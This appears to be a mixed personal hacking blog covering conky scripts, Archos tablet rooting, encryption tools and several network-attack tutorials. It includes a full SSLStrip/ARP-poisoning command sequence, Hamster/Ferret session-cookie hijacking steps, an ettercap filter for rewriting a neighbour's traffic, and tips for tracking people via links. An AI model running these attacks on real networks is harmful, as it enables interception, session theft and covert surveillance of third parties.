Shell script to check IP (For use with conky)

Well as I used conky on BT4 I began to like having my private IP displayed, so I decided to look at the script it used and it's as simply as this, make a file on your desktop named ip.sh and add the following;

#!/bin/bash
wget -q -O - checkip.dyndns.org|sed -e 's/.*Current IP Address: //' -e 's/<.*$//'

Save this file and make it executable with the following command;

chmod 775 ip.sh

This allows you to read, write and execute the file. You can now try it out with "./ip.sh" and it should display your IP in the shell. If so then it's ready for use with conky. To use a shell script in conky you need to add the following command to the .conkyrc;

${execi 300 /home/youruser/Desktop/ip.sh}

If all's well, it's displaying your IP now.

Hamster & Ferret

"Hamster is a tool for HTTP session hijacking with passive sniffing. It eavesdrops on a network, captures the session cookies, then imports them into the browser to allow you to hijack their session. There is a more complete description in the help section."

These tools make a great addition when performing the MITM attack I demonstrated in the SSLStrip video.

So say we got everything setup like we did in the video, we can fire these up by going to the directory they're installed in (which is /pentest/sniffers/hamster/ for BT4) then start up ferret like so "./ferret -i wlan0"

Then you can start hamster next with "./hamster" then open your browser of choice and set the proxy to "127.0.0.1 : 1234" like it says. Type hamster in the url, select your interface and there you go. Easy as that.

Download these tools with apt-get install hamster or download here

TrueCrypt

	Main Features:
	Creates a virtual encrypted disk within a file and mounts it as a real disk. Encrypts an entire partition or storage device such as USB flash drive or hard drive. Encrypts a partition or drive where Windows is installed (pre-boot authentication). Encryption is automatic, real-time (on-the-fly) and transparent. Parallelization and pipelining allow data to be read and written as fast as if the drive was not encrypted. Encryption can be hardware-accelerated on modern processors. Provides plausible deniability, in case an adversary forces you to reveal the password: Hidden volume (steganography) and hidden operating system.   Read more here - http://www.truecrypt.org/docs/  Download using the apt-get command or - http://www.truecrypt.org/downloads

Crypting text with my new favorite text editor, VIM.

So this is extremely simply, if you know about it. Which I didn't untill just now when looking for a simple way to encrypt text data. Now it's as simple as this, when starting a new file run this command to have it encrypted as well;

"vim -x filename"

Which will prompt you for the password you would like to use to encrypt it. To save a while once you've finished up press "ctrl o" then ":w filename"

And you're done. Though I'm not all to sure how secure the encryption is, I still suggest using truecrypt.

You can get vim with the "apt-get install vim" command.

Quick Python Script/Example For Finding The Mac and IP Of Users On Your LAN.

Well I wanted a quicker way to check what hosts are on my lan other than pinging/nmap/opening a browser and generating a bunch of data. So I made this quick script to save time and display it in a shell. Very basic but it's may serve someone some good as an example. I'm still learning so if I improve it (likely) than I'll post an update.

 

import urllib
import re
users = urllib.urlopen("Your Routers Client Table URL")
users = users.read()
ips = re.findall('(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})\.(?:[\d]{1,3})', users)
print "[=>Live Hosts<=]"
print ips
X = '([a-fA-F0-9]{2}[:|\-]){5}[a-fA-F0-9]{2}'
c = re.compile(X).finditer(users)
if c:
    for y in c:
        print users[y.start(): y.end()]

Example Picture;

PacketFountain: Network Sniffing Screensaver

Well, if your using windows and you're getting tired of your screensaver you should check this out. It's a packetsniffing screensaver! Not the cleanest looking in the world but it's much better that a flying box or some pipes. It's called "PacketFountain" and was put together by IronGeek. It's written in VB6 and uses the WinPcap wrapper.

Steps to install

1. copy ./bin/PacketFountain.scr to windows directory (c:\windows\).
2. copy ./bin/VBPCAP.DLL to windows\system32 directory (c:\windows\system32).
3. Install Winpcap from http://winpcap.polito.it/ .
4. Go to Display Properties->Screen Saver and choose PacketFountain.
5. Click the settings button and choose your network card, number of packets, active monitors and speed.

I personally had an issue with changing the settings, but it's not a big deal.


Download

IronGeek's DecaffeinatID

Well I've been playing around a bit with a windows VM that acts as a Honeypot/IDS for my network which I can remotely monitor with my Archos7 via VNC. One of the apps I've come across is "DecaffeinatID" which is a very simple IDS/ARP Watcher. I've never heard of it before and found it quite a nice addition to my arsenal so I figured I would spread the info. Here's alittle bit of info about it, taken from IronGeek.

This project started because I (IronGeek) wanted a simple ARP Watch like application for Windows. In a short matter of time, feature creep set in. DecaffeinatID is a simple little app that acts as an Intrusion Detection System (more of a log watcher really) to notify the user whenever fellow users at their local WiFi hotspot/ LAN are up to the kind of "reindeer games" that often happen at coffee shops and hacker cons. It's not meant to be a replacement for something more feature rich (but complicated) like Snort. DecaffeinatID watches the Windows logs for three main things and pops up a message in the Windows Systray when it sees any of the following

New or changed ARP table entries

Think of this as a poor man's ARPWatch for Windows. The IDS gives a special alert whenever it sees the MAC address of the IP gateway change.

 

New events in security log

This will let you know about attempted and successful logins, assuming you have set up auditing for such things in your local security settings.

New events in the firewall log

DecaffeinatID will read your Windows firewall log (if you have one) and list events

          

Download

You can find more info here

Ettercap Porn Filter

Ever get tired of your little brother or your perverted neighbor watching porn and wasting perfectly good bandwith on nonsense. Well here's a fun solution to that Below is an ettercap filter I tossed together to play around with. To create an ettercap filter you first have to create a new file to begin scripting. In this case it will be "hak.filter". Once you have your desired filter scripted, you can then compile it using Etterfilter and then it's ready for use.

Below is an example filter for people to play with and get an idea of how they work. What it does is quite obvious, it changes the word porn to a link saying "You Need Help" which takes them to "www.no-porn.com", a site for porn addiction. It also changes a few other words

You can find the script here;

http://pastebin.com/L7PCPNap

To compile it simply make a new file called hak.filter than once you have your desired script ready, you use this command in a terminal.

etterfilter hak.filter -o name.ef

At this point the filter is ready for use, to use it simply add a "-F name.ef" when running ettercap.

Example Useage: ettercap -TM arp:remote // // -F name.ef -i wlan0

Man In The Middle tutorial - SSLStrip and Arp Poisoning.

Linux Distro

• Backtrack4 R1 http://www.backtrack-linux.org/downloads/

Tools used

• Ettercap
• SSLStrip
• Dsniff suite (URLSnarf)
• Driftnet
• Arpspoof
• fping
• nano

Commands

• nano /etc/etter.conf
• fping -a -g 192.168.1.9 192.168.1.1 -s >hosts
• sslstrip -a -k -f
• iptables -t nat -A PREROUTING -p tcp --destination-port  80 -j REDIRECT --to-ports 10000
• echo "1" > /proc/sys/net/ipv4/ip_forward
• arpspoof -i wlan0 -t 192.168.1.9 192.168.1.1
• ettercap -Tq -L etterlogs -i wlan0
• urlsnarf -vvv -i wlan0
• driftnet -v -i wlan0 

A possible fix for hopeless Archos7's that wont stop restarting

Well I recently had a Archos7 that would not stop resetting when I booted it. The damn thing would reboot the second I touched the screen, and in some cases before it could even boot. I'm not sure if this will solve others problems but I simply put a new rom (Update.img) on an SD card and the moment it booted (took a few tries) I slipped the card in and quickely hit the Update button before it had the chance to reboot and just like that, it worked perfectely.

Hacking the Archos 7 Home Tablet (Getting Google apps& root!)

All the builds are currently for the 8GB version. If you have a 2GB version take EXTRA caution and be sure you want to be the first to try this.

Now that that's out of the way, lets begin. Below is the link for a rooted version of my ROM and also includes Google Apps as seen in "Operation Unbrickable: The quest for Google Apps". Let me explain what "rooted" means. The the best of what I have been able to find, rooted allows apps to run as superuser or "su" or sudo, all of which means that they are running as the root user. This can play havoc on your device if you aren't VERY careful and pay attention to what apps are asking for what permission. To help fight illicit apps asking for su I included the superuser app in this build. This app will pop-up when ever an app asks for su permissions and you can allow or deny and there is also an option to always allow or always deny the app.

This build also has the contacts.apk file pre-installed but you will still need to reinstall the contactsprovider.apk file in order to get Google contacts to sync properly.

The good:
- All Google Apps work
- Apps that require root work!!!
- ADB SU works (after typing su in ADB be sure you click accept in the superuser app pop-up on the device)

The not so good:
- Still need to reinstall googlecontactsprovider.apk to get contacts sync to work

The bad:
- None that I know of (prepares to put foot in mouth)

Still to come:
- Increased app space
- Apps2SD

Added files not in standard Archos build:
- All the files for the market and apps
- SuperUser.apk
- special su file in system/bin chmod'd to 06755
- edited su file in system/xbin chmod'd to 755 and chown'd to root:root

V.2 IMG Download - www.mediafire.com/file/2oliyzznmqo/update.img

Version 0.2.1 with increased app space
This version is still in the works but I wanted to get it out. The difference between this and 0.2 is that this image contains a 290MB app space so you can install 5 x the apps. The down side is the install process. This is not for everyone! I do not have a new device to test this on. My drive was partitioned several different times several different ways before I got a working image for me so I can only HOPE this will work for you. Only do this if you know how to use the RockChip flasher until you hear that it works for other folks.

Other changes to this image:
- usb debugging is enabled by default
- new default background matching the boot screen thanks to pmarin

***WARNING***
You WILL lose everything on your device that isnt in an SDHC card.

Windows Instructions:
1. flash device with updated image as per normal procedure
2. when the device boots up, insert usb cable and mount the drive. If you are in windows, you should get a message saying that the drive needs to be formatted before it can be used. Go ahead and format it with default settings (fat32).
3. wait 45 minutes
4. flash device again with same 0.2.1 image.
5. report back here any issues.

*nix Instructions (thanks quindo):
same as windows except for format procedure below
- Use 'dmesg' to find out which devices are added to your system (in my case sdb and sdc)
- Format the second device (sdc in my case) with the command: mkfs.vfat -F 32 -I /dev/sdc

Download version 0.2.1 IMG here - http://www.mediafire.com/?y5zy2hwotilhjmq


-----------------------------------------------------------------------------------------------------------------------------------

V.3 IMG Download - http://www.mediafire.com/file/mmyfnwnwmdm/update.img

Load this update.img into the root of your A7HT, install it and you will have Google Apps.

The Good:
Android Market, Gmail, GMaps, Google Talk and Google Calendar works.

The Not so good:
The install of Google contacts sync is a work around.

The Bad:
None that I know of. Hopefully fixed it all.

Risk of losing all your data you already have set up:
100%. This is a complete wipe of what is there and installing a brand new image.

Instructions:

  1. Load the update.img linked at bottom of thread into the root of your A7HT.
  2. Turn off USB sharing and you will be prompted to install an update.
  3. Click install and A7 will reboot
  4. Install the update and eventually go back to the setup screen
  5. Go into settings, turn on WiFi and connect to your router
  6. Once it is connected:
    a. Open any of the Google apps (market, Gmail, Calendar)
    b. Go through the Google setup screens.
    c. Upon completion install: contacts.apk and GoogleContactsProvider.apk.
    Note: GoogleContactsProvider.apk will give you some message about it being a system app that is already installed.... Click OK and continue.
  7. All is well with the world.
  Note: Yes, I know you will get an additional app called dialer. You'll just have to deal with it as it's part of the contacts.

A big thanks to Dom at http://forum.archosfans.com/

And this app for one-click rooting seems to be working for a temp root;
http://www.androidpolice.com/2010/08/10/universal-androot-app-offers-one-click-root-on-a-multitude-of-devices-g1-nexus-one-droid-droid-x-hero-x10-streak-and-more/

Kismet - An excellent tool for your arsenal.

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.

Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and infering the presence of nonbeaconing networks via data traffic.

Driftnet - See what pictures people on your network are looking at.

Inspired by EtherPEG (though, not owning an Apple Macintosh, I've never actually seen it in operation), Driftnet is a program which listens to network traffic and picks out images from TCP streams it observes. Fun to run on a host which sees lots of web traffic.

In an experimental enhancement, driftnet now picks out MPEG audio streams from network traffic and tries to play them. You can also now use driftnet with Jamie Zawinski's webcollage, so that it can run as a screen saver.

Netcat cheat sheet!

Download the PDF from here.

Get someones IP/System info with nothing more than a link.

Here's another useful site, this one can be used to collect a persons IP/OS/Browser/Etc with nothing more then a URL. It can also redirect to a specific site so it would be perfect to use with the other site I posted about (http://hyfbt.com)

Thus collecting even more data. You could get someones IP/OS/Browser/Etc AND also get their browsing history.

Check it out here, the source is also available so you could implement this into your own site.

irssi, my favorite IRC Client.

Irssi is a terminal based IRC client for UNIX systems. It also supports SILC and ICB protocols via plugins. Below is a screenshot of mine (it's extremely plain)
                        

                                

Greatest features

You might be wondering what makes Irssi such an easy and comfortable client to use; Joost Vunderink wrote a summary of the most beneficial Irssi features.

• Autologging
  

  Irssi will automatically log any channels, queries or special windows that you want. The logfiles will be separated per IRC network, and even log rotation is supported. Log file formats, themes and destination directories can be easily configured with the Irssi log settings.

• Formats and themes
  

  Theming is a popular item in todays desktop enviroments, it's an easy yet powerful way to customize your Irssi client's look and feel. Irssi's formatting is modular which means you can just change the appearance of the objects and all items contaning that object will change into that format.

• Perl scripting
  

  Perl is one of the most used programming languages around the globe and integrating Perl into applications means flexible and powerful scripting capabilities. The entire behavior and appearence of Irssi can be modified within these Perl scripts. Irssi provides a script archive with many contributed Irssi scripts which provide both useful extra features and the required assistance to make your own scripts.

• Irssi-proxy
  
  

  This is much more than just a bouncer, Irssi-proxy is a plugin which allows to bind a port to each IRC server you are connected to. This means that instead of having to remember to identify with a password, you can just connect to the Irssi-proxy with a server password. The copy of Irssi running the proxy works just as a normal client which you can use, but you can also connect one or more clients to it to share the connections. Using Irssi as a proxy has the major advantage of Irssi's power as an IRC client. You never have to worry about losing your connection to IRC. Even if you don't want to use Issi as a client, I can strongly recommend it as a proxy because you can just connect to it with any IRC client by just connecting to the specified port instead of SSH-ing to the machine that your Irssi is running on.

 You can download irssi from here, or use the repositories.

Learning Python (Again)

Well I've got some free time on my hands so I've been playing around with python again. I made this script to listen on a specified port for connections. When someone tries to connect (a attacker using netcat/telnet or running noisy scans perhaps) it will log the time and IP/Port they connected from. This script could still use alot of improvements but it serves the purpose I intended it for. I will most likely update it at some point soon but here it is as of now. Be sure to port forward if you use a router and want to use the script outside LAN.

See what 'explicit' sites (and more) your friends have been on.

Well I came across this while checking out some forums and thought it was worth a post. http://www.haveyourfriendsbeenthere.com/

As simple as sending a link to your friend.

Keep your keystrokes secure.

I figured while I was talking about keyloggers I'd take a moment and mention 'Keyscrambler'. It encrypts the keystrokes deep in the kernal, preventing the attacker from reading them and leaving him with encrypted gibberish.

You can read more and download 'Keyscrambler'  here

Getting Login Credentials From Unencrypted Keyloggers.

Well to start off this blog I'll be writing a simple tutorial using the tool 'Bintext'. Very simple to use and this tutorial will be very basic. Start off by downloading 'Bintext' from here

Now open it up and you should see this;

As you can see it's pretty straight forward. Browse your system for the keylogger you wish to check for logins and then hit 'Go'

At this point it should look like this;

Now you can type in a variety of things to search for, the ones I've had the best results with is 'smtp', 'gmail', 'ftp', '.com'. Keep in mind it's case sensitive.

                  Congratulations you just dealt some karma.^.^ A good place to find unencrypted keyloggers is youtube, just search obvious stuff (such as steam game added) under the 'Search options->Today' search settings. Just be careful not to infect yourself on accident.